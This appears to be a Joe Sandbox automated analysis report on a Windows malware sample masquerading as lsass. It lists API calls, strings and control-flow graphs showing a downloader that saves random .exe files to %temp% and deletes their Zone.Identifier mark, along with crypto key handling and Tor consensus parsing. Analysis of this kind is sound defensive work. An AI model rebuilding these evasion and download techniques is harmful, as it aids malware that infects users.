              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
              • String ID: %s\%s$%s\%s$%s\*
              • API String ID: 92872011-445461498
              • Opcode ID: 20c532b906107e19feee765081c7a8f68861a9fa0d28062ed2222936e84fd475
              • Instruction ID: ec575a2487ee0cc99f793fd88b825721326b57fa79d2012088464d7b9dd8653d
              • Opcode Fuzzy Hash: 20c532b906107e19feee765081c7a8f68861a9fa0d28062ed2222936e84fd475
              • Instruction Fuzzy Hash: 7F3184B5980608DFCB54EB70DC89EDA777CBB44301F50C588F60992141EB38DA48CF99
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1620 778e30-778e52 socket 1621 778fbc-778fc2 1620->1621 1622 778e58-778ec1 setsockopt call 773310 htons htonl bind 1620->1622 1625 778fa7-778fad 1622->1625 1626 778ec7-778ed8 listen 1622->1626 1625->1621 1627 778faf-778fb6 closesocket 1625->1627 1626->1625 1628 778ede-778efc getsockname 1626->1628 1627->1621 1628->1625 1629 778f02-778fa4 call 772100 * 2 htons * 2 1628->1629 1629->1625
              APIs
              • socket.WS2_32(00000002,00000001,00000006), ref: 00778E40
              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 00778E73
              • htons.WS2_32(00000000), ref: 00778E8C
              • htonl.WS2_32(7F000001), ref: 00778EA4
              • bind.WS2_32(00000000,?,00000010), ref: 00778EB9
              • listen.WS2_32(00000000,00000064), ref: 00778ED0
              • getsockname.WS2_32(00000000,?,00000010), ref: 00778EF4
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • htons.WS2_32(?), ref: 00778F2D
              • htons.WS2_32(?), ref: 00778F56
              • closesocket.WS2_32(00000000), ref: 00778FB6
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: htons$bindclosesocketgetsocknamehtonllistenmemmovesetsockoptsocket
              • String ID: 127.0.0.1:%hu$http://127.0.0.1:%hu
              • API String ID: 1977552280-2042925195
              • Opcode ID: 027b4c1e1ff7c9ea7889aa20ba1056f2207e2fe473eb670cb09a90c863545d5b
              • Instruction ID: 6af6e3ad9a693779abdea868d910698aab9aea55d5b6e4303fd55ff21c9e133c
              • Opcode Fuzzy Hash: 027b4c1e1ff7c9ea7889aa20ba1056f2207e2fe473eb670cb09a90c863545d5b
              • Instruction Fuzzy Hash: 3B41B4B2A90204AFDB10DFA4DC49FBE7B79BB44701F14C408F7459A1D1EBB89900CB69
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • memmove.MSVCRT ref: 00772194
              • CryptAcquireContextA.ADVAPI32(0078A014,00000000,?,0000000D,F0000000), ref: 007721DE
              • CryptAcquireContextA.ADVAPI32(0078A11C,00000000,?,00000018,F0000000), ref: 007721FA
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00772223
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0077223C
              Strings
              • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00772148
              • Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider, xrefs: 0077215B
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: ContextCrypt$AcquireReleasememmove
              • String ID: Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider$Microsoft Enhanced RSA and AES Cryptographic Provider
              • API String ID: 2654783079-2824478982
              • Opcode ID: e9bb65ef5e50282e8991c24f044d582c23a48033da7d412c8fe81bee44015bb7
              • Instruction ID: 4d2964ff020905bf22a70ef067067cc6ccffec0833662477510b39ae6517f785
              • Opcode Fuzzy Hash: e9bb65ef5e50282e8991c24f044d582c23a48033da7d412c8fe81bee44015bb7
              • Instruction Fuzzy Hash: 9F21A9B1AC0304BAFB20A7609C1BFE937246B60700F64C055F648651C3F9ED564897A7
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 007726B0
              • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,?), ref: 007726CD
              • CryptSetKeyParam.ADVAPI32(?,00000004,00000002,00000000), ref: 007726F0
              • memmove.MSVCRT ref: 0077270D
              • CryptDestroyKey.ADVAPI32(?,?,00000004,00000002,00000000), ref: 0077274F
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Crypt$memmove$DestroyImportParam
              • String ID: ~(w
              • API String ID: 4072243228-840095357
              • Opcode ID: eae9fa73bb8cf25d1dac6bfa38308c7c98d924aa141b6286e647c7ad1b95cd9e
              • Instruction ID: e23f67c60975db6123d968988427d8e98024740532c06bcca194bff24db257ec
              • Opcode Fuzzy Hash: eae9fa73bb8cf25d1dac6bfa38308c7c98d924aa141b6286e647c7ad1b95cd9e
              • Instruction Fuzzy Hash: 4A219174A40248ABEB14CFA0CC85FEE7BB4AF58340F14C408FA596B281D779DA45CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 00772BC6
              • memmove.MSVCRT ref: 00772BE1
                • Part of subcall function 007722B0: CryptGenRandom.ADVAPI32(?,00772BFD,0077A356,?,00772BFD,0077A356,00000080), ref: 007722C2
              • CryptImportKey.ADVAPI32(?,0077A466,00000190,00000000,00000001,?), ref: 00772C1F
              • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 00772C45
              • CryptDestroyKey.ADVAPI32(?), ref: 00772C79
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Crypt$memmove$DestroyExportImportRandom
              • String ID:
              • API String ID: 2808701524-0
              • Opcode ID: 59415d5a1c5d0d7c57e9bd9515dcabea7924eab71d316385c59c8d7f2577b873
              • Instruction ID: 3559add37bd3376d824f9d8868975973ac9f1288420ae2cf4ce9e1598ff2c79d
              • Opcode Fuzzy Hash: 59415d5a1c5d0d7c57e9bd9515dcabea7924eab71d316385c59c8d7f2577b873
              • Instruction Fuzzy Hash: 6731C1B4640208BBEB10DF64CC8AF9A7B75AB44344F14C148FA485F3C2E679EA858B95
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memcpy.MSVCRT ref: 0077FDDF
              • memcpy.MSVCRT ref: 0077FDF3
              • CryptImportKey.ADVAPI32(00000000,00000008,0000001C,00000000,00000000,00000000), ref: 0077FE17
              • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 0077FE3D
              • CryptDestroyKey.ADVAPI32(00000000), ref: 0077FE50
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Crypt$memcpy$DestroyEncryptImport
              • String ID:
              • API String ID: 774555595-0
              • Opcode ID: a8377d4a8c58045ce65df851877e50f2ed50b6debd0dc0bb2d11d7e42eb51a6c
              • Instruction ID: b6793348c2dc29b59a3e1628cc4addbde42674d157ef8914927aba3155d4501d
              • Opcode Fuzzy Hash: a8377d4a8c58045ce65df851877e50f2ed50b6debd0dc0bb2d11d7e42eb51a6c
              • Instruction Fuzzy Hash: 99310BB5A44249EFDF00CFE8C845BEEBBB5AF58300F148559E619B7280D7749A04CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000040,?,0077254A,?,00772593), ref: 00772446
              • CryptGetKeyParam.ADVAPI32(00000004,00000009,?,00000004,00000000,?,00000000,00000040,?,0077254A,?), ref: 00772469
              • CryptDestroyKey.ADVAPI32(00000000,?,00000000,00000040,?,0077254A,?), ref: 0077248F
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Crypt$DestroyImportParam
              • String ID: J%w
              • API String ID: 4196615532-2766071164
              • Opcode ID: f4c2bc7490b23e8b647580b33ed9d7b98edf6f47f7cf7e3bc708016f34fe85bb
              • Instruction ID: 105660dfc99f82f91db85c423af7801eb48dcc198dd67e490cf1c4d8db0d71d7
              • Opcode Fuzzy Hash: f4c2bc7490b23e8b647580b33ed9d7b98edf6f47f7cf7e3bc708016f34fe85bb
              • Instruction Fuzzy Hash: 83115274740248FFDB10DFA4C855FAEBB79AB45300F10C199F9459B281E6749A01CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 00772CB0
              • CryptImportKey.ADVAPI32(?,?,00000190,00000000,00000001,?), ref: 00772CED
              • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 00772D1C
              • CryptDestroyKey.ADVAPI32(?), ref: 00772D5D
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Crypt$DestroyExportImportmemmove
              • String ID:
              • API String ID: 1806151904-0
              • Opcode ID: 87bc8ab245c49b47d2f07680b9332e0e006adbaf6f71e5bcb42be875b34330ae
              • Instruction ID: 4dd4f23f5f5359bed63862f05b82ffe09345606fce80baa4e74789ab0b832aa0
              • Opcode Fuzzy Hash: 87bc8ab245c49b47d2f07680b9332e0e006adbaf6f71e5bcb42be875b34330ae
              • Instruction Fuzzy Hash: 4B219A72A40618AFEF30DB64DC49FDA7778AF49701F0441C8F60D9A1C1E6749B948FA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptHashData.ADVAPI32(000001FD,00000000,?,00000000,000001FD), ref: 00772A08
              • CryptDuplicateHash.ADVAPI32(000000FF,00000000,00000000,000000FF), ref: 00772A1E
              • CryptGetHashParam.ADVAPI32(000000FF,00000002,?,?,00000000), ref: 00772A38
              • CryptDestroyHash.ADVAPI32(000000FF), ref: 00772A4B
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CryptHash$DataDestroyDuplicateParam
              • String ID:
              • API String ID: 1241924263-0
              • Opcode ID: be049e702805bff8f444976216d95040f579d1b1f0e5132d5da2aedbef204dc8
              • Instruction ID: f009505f04be4bdf83e84d31fc96e7ffe0d62be032b8f3937dc159def9819789
              • Opcode Fuzzy Hash: be049e702805bff8f444976216d95040f579d1b1f0e5132d5da2aedbef204dc8
              • Instruction Fuzzy Hash: 4E012879680208BBDB10CFB4DC46FAE7BB9AB48740F108158FE05DA280D675DA018BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              APIs
              • GetTickCount.KERNEL32 ref: 00780419
              • srand.MSVCRT ref: 00780420
              • rand.MSVCRT ref: 00780428
              • Sleep.KERNEL32 ref: 0078043F
              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 0078045D
              • strlen.MSVCRT ref: 00780467
              • mbstowcs.MSVCRT ref: 0078047E
              • rand.MSVCRT ref: 00780486
              • rand.MSVCRT ref: 0078049A
              • wsprintfW.USER32 ref: 007804C1
              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007804D7
              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00780506
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00780535
              • memset.MSVCRT ref: 0078055C
              • InternetReadFile.WININET(00000000,?,00000207,?), ref: 0078057E
              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 007805AF
              • CloseHandle.KERNEL32(000000FF), ref: 007805BE
              • Sleep.KERNEL32(000003E8), ref: 007805C9
              • wsprintfW.USER32 ref: 007805E2
              • DeleteFileW.KERNEL32(?), ref: 007805F2
              • Sleep.KERNEL32(000003E8), ref: 007805FD
              • Sleep.KERNEL32(000003E8), ref: 0078061E
              • DeleteFileW.KERNEL32(?), ref: 0078064B
              • CloseHandle.KERNEL32(000000FF), ref: 00780658
              • InternetCloseHandle.WININET(00000000), ref: 00780665
              • InternetCloseHandle.WININET(00000000), ref: 00780672
              • Sleep.KERNEL32(000003E8), ref: 0078067D
              • rand.MSVCRT ref: 00780692
              • Sleep.KERNEL32 ref: 007806A9
              • rand.MSVCRT ref: 007806AF
              • rand.MSVCRT ref: 007806C3
              • wsprintfW.USER32 ref: 007806EA
              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00780707
              • wsprintfW.USER32 ref: 00780723
              • DeleteFileW.KERNEL32(?), ref: 00780733
              • Sleep.KERNEL32(000003E8), ref: 0078073E
              • Sleep.KERNEL32(000003E8), ref: 0078075F
              • DeleteFileW.KERNEL32(?), ref: 0078077D
              Strings
              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 007804D2
              • %ls\%d%d.exe, xrefs: 007806DE
              • %ls:Zone.Identifier, xrefs: 00780717
              • %ls\%d%d.exe, xrefs: 007804B5
              • %ls:Zone.Identifier, xrefs: 007805D6
              • %temp%, xrefs: 00780458
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: FileSleep$rand$Internet$CloseDeleteHandlewsprintf$Open$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
              • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
              • API String ID: 827890202-3055678928
              • Opcode ID: f14437b4be0b807f224b608bfecf9adcf6e18ade73e416a56b7468851da3df73
              • Instruction ID: 775f35be03b1b988804902e2d68035037fc3725871fe9dd81d92d312b5ed67a9
              • Opcode Fuzzy Hash: f14437b4be0b807f224b608bfecf9adcf6e18ade73e416a56b7468851da3df73
              • Instruction Fuzzy Hash: 1D81D9B5A80718EBDB10EB60DC4DFE93339BBC8701F148598B209951D1EABC9B94CF65
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1091 7781c0-778334 call 7841c0 call 772100 * 14 call 7735d0 call 773c20 1126 778962 1091->1126 1127 77833a-778352 call 773c20 1091->1127 1128 778969-778982 call 7735f0 1126->1128 1133 778960 1127->1133 1134 778358-778391 call 773a30 1127->1134 1133->1128 1138 778393-77839d 1134->1138 1139 77839f-7783ab 1134->1139 1140 7783b1-7783ba 1138->1140 1139->1140 1141 7783c0-778445 inet_ntop call 778990 1140->1141 1142 778938-778941 1140->1142 1152 778926-77892f 1141->1152 1153 77844b-778466 1141->1153 1143 778953 1142->1143 1144 778943 1142->1144 1145 778953 call 773b80 1143->1145 1147 778943 call 773b80 1144->1147 1148 778958-77895e 1145->1148 1150 778948-778951 1147->1150 1148->1133 1150->1133 1154 778933 1152->1154 1155 778931 1152->1155 1157 778917-778923 call 773410 1153->1157 1158 77846c-778493 call 784030 1153->1158 1154->1142 1155->1142 1157->1152 1163 77849a-7784a3 1158->1163 1164 77887d-778886 1163->1164 1165 7784a9-7784b2 1163->1165 1164->1157 1166 77888c-77889c call 784080 1164->1166 1165->1164 1167 7784b8-7784d7 1165->1167 1166->1157 1173 77889e-7788bf 1166->1173 1171 778876 1167->1171 1172 7784dd-77850b 1167->1172 1171->1164 1174 778878 1171->1174 1177 778527-77852e 1172->1177 1178 77850d-778521 1172->1178 1179 778903-778909 1173->1179 1180 7788c1-7788e6 1173->1180 1174->1163 1182 778534-77856a 1177->1182 1183 778872 1177->1183 1178->1177 1181 778910 1179->1181 1180->1179 1187 7788e8-7788f2 1180->1187 1181->1157 1190 778570-77859e 1182->1190 1191 77885b 1182->1191 1183->1164 1185 778874 1183->1185 1185->1174 1187->1179 1189 7788f4-778901 1187->1189 1189->1179 1189->1181 1194 7785a4-7785d2 1190->1194 1195 778852 1190->1195 1192 778862-778870 1191->1192 1192->1185 1198 778849 1194->1198 1199 7785d8-7785f7 1194->1199 1196 778859 1195->1196 1196->1192 1200 778850 1198->1200 1202 778847 1199->1202 1203 7785fd-778649 1199->1203 1200->1196 1202->1200 1205 778840 1203->1205 1206 77864f-778679 1203->1206 1205->1202 1209 77867b-77868e 1206->1209 1210 7786f9 1206->1210 1209->1210 1216 778690-7786a6 1209->1216 1211 778703-778718 1210->1211 1212 77876e 1211->1212 1213 77871a-778730 1211->1213 1215 778778-7787c0 lstrlenA call 7730f0 1212->1215 1213->1212 1221 778732-778748 1213->1221 1223 778837 1215->1223 1224 7787c2-7787f2 call 773040 1215->1224 1216->1210 1222 7786a8-7786be 1216->1222 1221->1212 1228 77874a-778760 1221->1228 1222->1210 1231 7786c0-7786d3 1222->1231 1227 77883e 1223->1227 1232 7787f4-778823 call 783fa0 1224->1232 1233 77882e 1224->1233 1227->1202 1228->1212 1237 778762-77876c 1228->1237 1231->1210 1240 7786d5-7786eb 1231->1240 1241 778825 1232->1241 1242 77882c 1232->1242 1236 778835 1233->1236 1236->1227 1237->1215 1240->1210 1244 7786ed-7786f7 1240->1244 1241->1242 1242->1236 1244->1211
              APIs
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
                • Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB
              • inet_ntop.WS2_32(00000002,?,?,00000080), ref: 007783E6
              • lstrlenA.KERNEL32(?,?,00000014,00000040), ref: 007787A5
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: CriticalEnterSectioninet_ntoplstrlenmemmove
              • String ID: p $r $r $s $ BadExit$ Exit$ Fast$ Guard$ Running$ Stable$ StaleDesc$ Valid$ circwindow=$%*s %s %s %*s %*s %*s %s %s %hu$<$HSDir $accept 1-65535$directory-footer$http://%s:%hu/tor/status-vote/current/consensus.z
              • API String ID: 3485021903-298003833
              • Opcode ID: 2c119e0a21f99d4081f538c12631cd577d89f67a5c9031a9f1e08b0f9d47a58f
              • Instruction ID: 19f3b3eb210a674e84b54879955412e5b174b139d37d1c78d25243409d45e501
              • Opcode Fuzzy Hash: 2c119e0a21f99d4081f538c12631cd577d89f67a5c9031a9f1e08b0f9d47a58f
              • Instruction Fuzzy Hash: DA2292B59442689FDF24DB90CC49FEDB7B8EB44340F1484D9E60DB6182DB789A84CF62
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1268 7762e0-776369 call 7841c0 call 7733f0 call 772100 * 4 1281 77637d 1268->1281 1282 77636b-77637b lstrlenA 1268->1282 1283 776387-776397 1281->1283 1282->1283 1284 776780-776783 1283->1284 1285 77639d-7763a9 SetLastError 1283->1285 1288 776789-776792 1284->1288 1286 7763bd 1285->1286 1287 7763ab-7763bb lstrlenA 1285->1287 1289 7763c7-7763ff 1286->1289 1287->1289 1290 776794-77679d call 773410 1288->1290 1291 7767a0-7767a9 1288->1291 1295 776405-776409 1289->1295 1296 776773-77677c GetLastError 1289->1296 1290->1291 1297 77641d 1295->1297 1298 77640b-77641b lstrlenA 1295->1298 1299 77677e 1296->1299 1300 776427-776434 1297->1300 1298->1300 1299->1288 1301 776436-77643f 1300->1301 1302 776441 1300->1302 1303 77644b-77644f 1301->1303 1302->1303 1304 776451-77645b 1303->1304 1305 77645d 1303->1305 1306 776467-77646b 1304->1306 1305->1306 1307 77646d-776476 1306->1307 1308 776478 1306->1308 1309 776482-77656d lstrlenA 1307->1309 1308->1309 1317 776573-77658f 1309->1317 1318 77674e-776757 GetLastError 1309->1318 1323 776591-776595 1317->1323 1324 7765cb-7765d1 1317->1324 1319 776759-776762 1318->1319 1320 776764-77676a 1319->1320 1321 776771 1319->1321 1320->1321 1321->1299 1327 776597-77659b 1323->1327 1328 77659f-7765c5 call 7734d0 1323->1328 1325 776737-776740 GetLastError 1324->1325 1326 7765d7-7765fc 1324->1326 1330 776742-77674c 1325->1330 1336 776602-77660c 1326->1336 1337 77672a-776733 GetLastError 1326->1337 1327->1324 1333 7765c7 1328->1333 1334 7765c9 1328->1334 1330->1319 1333->1324 1334->1317 1339 776612-77663b 1336->1339 1340 776728 1336->1340 1338 776735 1337->1338 1338->1330 1339->1340 1342 776641-776654 1339->1342 1340->1338 1342->1340 1344 77665a-7766a9 call 7733f0 call 7734a0 1342->1344 1344->1340 1349 7766ab-7766d3 call 771fb0 1344->1349 1352 7766d5-7766d9 1349->1352 1353 77670e-776717 1349->1353 1352->1353 1354 7766db-776707 call 773410 1352->1354 1353->1340 1355 776719-776725 call 773410 1353->1355 1354->1353 1355->1340
              APIs
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • lstrlenA.KERNEL32(00000000), ref: 0077636F
              • SetLastError.KERNEL32(00000000), ref: 0077639F
              • lstrlenA.KERNEL32(00000000), ref: 007763AF
              • lstrlenA.KERNEL32(00000000), ref: 0077640F
              • lstrlenA.KERNEL32(?), ref: 0077653A
              • _longjmp.LIBVCRUNTIMED ref: 0077669C
              • GetLastError.KERNEL32 ref: 0077672A
              • GetLastError.KERNEL32 ref: 00776737
              • GetLastError.KERNEL32 ref: 0077674E
              • GetLastError.KERNEL32 ref: 00776773
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: ErrorLast$lstrlen$_longjmpmemmove
              • String ID: %s%s%sConnection: closeAccept-Encoding: gzip$Proxy-Connection: close$SSx$WSx$deflate$gzip
              • API String ID: 3717562076-3900119746
              • Opcode ID: 7a2b114e92a2b3a61f1776a12d0fa8ecee327598d3277d15a1bd49e48a8c8243
              • Instruction ID: 4020a393b1289b2c7d3fb1ed827540c740faefeaec9054ccb74c850200399568
              • Opcode Fuzzy Hash: 7a2b114e92a2b3a61f1776a12d0fa8ecee327598d3277d15a1bd49e48a8c8243
              • Instruction Fuzzy Hash: B5E16BB5900258DFDF18DFA0CC49BEEB774BB44384F148198F649AB285D7B89A85CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
